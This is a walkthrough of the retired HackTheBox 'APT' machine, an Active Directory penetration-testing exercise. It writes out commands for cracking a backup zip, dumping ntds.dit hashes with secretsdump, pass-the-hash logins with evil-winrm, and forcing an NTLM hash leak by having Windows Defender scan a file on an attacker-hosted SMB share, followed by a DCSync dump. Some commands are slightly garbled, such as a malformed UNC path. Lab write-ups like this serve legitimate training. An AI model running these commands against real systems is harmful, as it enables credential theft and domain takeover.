Introduction to HackTheBox APT
In this article, we covered various aspects of Active Directory Penetration Testing using many techniques through this insane-level box.
The article also walks through hacking the retired “APT” machine on Hack The Box, which is rated insanely hard. The attack involves:
✅ Enumerating MSRPC and SMB
✅ Extracting Active Directory hashes
✅ Performing Kerberos attacks
✅ Exploiting NTLM leaks
✅ Gaining administrator access
HackTheBox APT Description
APT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of existing RPC interfaces provides an interesting object that can be used to disclose the IPv6 address. The box is found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks can give us access to the registry which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.
Walkthrough
1️⃣ Enumerating Microsoft RPC (MSRPC) on Port 135
MSRPC (Microsoft Remote Procedure Call) is used for Windows services.
Using rpcmap to list available mappings and interfaces.
The output reveals an IPv6 address, used for further attacks.
2️⃣ SMB Enumeration & Extracting Active Directory Database
Scanning SMB shares on port 445 using smbclient.
Finding & downloading backup.zip, which contains:
🔹 ntds.dit (Active Directory database)
🔹 SYSTEM (Registry file)
Cracking the zip password with john:
zip2john backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
- Password found:
"iloveyousomuch"
Extracting user hashes from Active Directory database:
secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile hashes.txt
This provides usernames and password hashes.
3️⃣ Identifying Active Users with Kerberos
Using kerbrute to find active users:
kerbrute -d apt.http.local -users users.txt
- This identifies “Henry Vincent” as an active user.
Testing the extracted hashes with crackmapexec:
crackmapexec smb apt.http.local -u henry -H hashes.txt
Login fails, so brute-forcing is needed.
4️⃣ Exploiting Kerberos Authentication
Using GetTGT.py to request a Kerberos Ticket Granting Ticket (TGT):
getTGT.py apt.http.local/henry -hashes LMHASH:NTHASH
This retrieves a Kerberos ticket, meaning the password hash is valid.
Extracting stored plaintext credentials from the registry using:
reg.py apt.http.local HENRY -hashes LMHASH:NTHASH -query "HKCU\Software"
Finds a plaintext admin password! 🔥
5️⃣ Gaining Initial Access with Evil-WinRM
Logging in using Evil-WinRM:
evil-winrm -i apt.http.local -u henry -p [plaintext-password]
First shell obtained! 🎉
6️⃣ Privilege Escalation – NTLM Hash Leak
Checking PowerShell history for misconfigurations:
cat C:\Users\henry\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Finds a misconfiguration in NTLM authentication settings.
- The admin disabled NTLMv2, making NTLM hashes leakable.
Forcing NTLM hash leak via Windows Defender scan:
- Host a malicious file on an SMB server:
sudo smbserver.py share /tmp -smb2support
Trigger a scan on the target:
cmd /c "C:\ProgramData\Windows Defender\mpcmdrun.exe -scan -scantype 3 -file \.10.14.5\share\test.txt"
The admin’s NTLM hash is captured in Responder.
7️⃣ Cracking NTLM Hash & DC Sync Attack
- Cracking the NTLM hash using CrackStation.
- Using
secretsdump.pyfor DC Sync attack:
secretsdump.py apt.http.local/ADMIN -hashes LMHASH:NTHASH
- Dumps all Active Directory passwords.
Logging in as Administrator:
evil-winrm -i apt.http.local -u Administrator -H ADMIN_NTLM_HASH
Root access achieved! 🎉🎉
Key Takeaways
✅ MSRPC enumeration can reveal network interfaces & IPv6 targets.
✅ Backup files often store sensitive data (Active Directory hashes, registry keys, etc.).
✅ NTLM misconfigurations can lead to severe leaks.
✅ Responder + Windows Defender scan can capture NTLM hashes remotely.
✅ DC Sync allows full Active Directory takeover once an admin hash is obtained.
